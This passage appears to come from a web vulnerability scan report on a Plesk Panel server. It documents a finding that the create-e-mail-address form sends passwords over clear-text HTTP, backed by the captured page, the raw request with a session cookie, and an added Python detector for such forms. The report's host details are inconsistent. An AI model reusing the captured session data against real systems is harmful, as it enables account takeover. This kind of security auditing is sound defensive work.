//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/create/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP: the form's action attribute is empty (action=""), so the browser posts back to the page's own URL, http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create/, on the plain-HTTP port 8880. The form contains the following password fields: general[generalSection][password] and general[generalSection][passwordConfirmation]. Both are rendered with autocomplete="off", which only stops the browser from storing the value and does nothing against interception on the wire; the PLESKSESSID session cookie in the request below travels over the same unencrypted connection.
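The check behind this finding, as an added example that is not part of the XSS.CX report or of Plesk: parse a response body, find every form that carries a password input, resolve its action against the URL the page was fetched from (an empty action posts back to that same URL), and report the form when the resolved scheme is http. The sample markup is a constructed excerpt modelled on the /smb/email-address/create/ response above; the field names and the page URL are the ones that response shows.

```python
"""Flag HTML forms that would submit a password field over clear-text HTTP.

Added example, not code from the report or from Plesk. Standard library only.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect, per <form>, its action attribute and the names of its password inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each entry: {"action": str, "passwords": [field names]}
        self._current = None   # the form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)    # boolean attributes arrive with value None
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "passwords": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (attrs.get("type") or "text").lower() == "password":
                self._current["passwords"].append(attrs.get("name") or attrs.get("id") or "?")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def cleartext_password_forms(page_url, html):
    """Return [(resolved_action_url, [password field names]), ...] for every form
    in `html` whose password fields would be posted over plain HTTP.

    `page_url` is the URL the document was served from; a relative or empty
    action is resolved against it exactly as a browser would.
    """
    scanner = _FormScanner()
    scanner.feed(html)
    findings = []
    for form in scanner.forms:
        if not form["passwords"]:
            continue
        target = urljoin(page_url, form["action"])   # "" resolves to the page's own URL
        if urlsplit(target).scheme.lower() == "http":
            findings.append((target, form["passwords"]))
    return findings


# Constructed excerpt of the create-address form; names and URL as in the response.
SAMPLE_PAGE_URL = "http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/create/"
SAMPLE_HTML = """
<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post">
<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="" />
<input type="password" name="general[generalSection][password]" autocomplete="off" />
<input type="password" name="general[generalSection][passwordConfirmation]" autocomplete="off" />
<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" />
</form>
"""

if __name__ == "__main__":
    for url, fields in cleartext_password_forms(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print("clear-text password submission to", url, "fields:", fields)
```

Run it against a saved response body and the URL it was fetched from; a form whose action points at an https:// URL, or a page fetched over https://, produces no finding, which is the same distinction the scanner draws.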

Request

GET /smb/email-address/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:48 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:50 GMT
Connection: close
Content-Length: 39818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>Create E-mail Address - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fcreate%2F' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span>Create E-mail Address</span></h2>
</div>
</div>


<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>
<div class="msg-box msg-error"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Error:</span> Invalid URL was requested. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="" class="input-text" /><b> @ vulnerable.host.fqdn</b> </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>Nobody</span>

</div>
</div>
</div>
<div id='general-generalSection-password-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][password]" id="general-generalSection-password" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">This password will be used if e-mail address is not assigned to a user account. E-mail addresses assigned to user accounts operate with user account passwords.</span>
</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-generalSection-password');
new Jsw.PasswordMeter({
renderTo: 'general-generalSection-password',
renderMode: 'after',
observe: 'general-generalSection-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-generalSection-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-generalSection-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[generalSection][passwordConfirmation]" id="general-generalSection-passwordConfirmation" value="" autocomplete="off" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
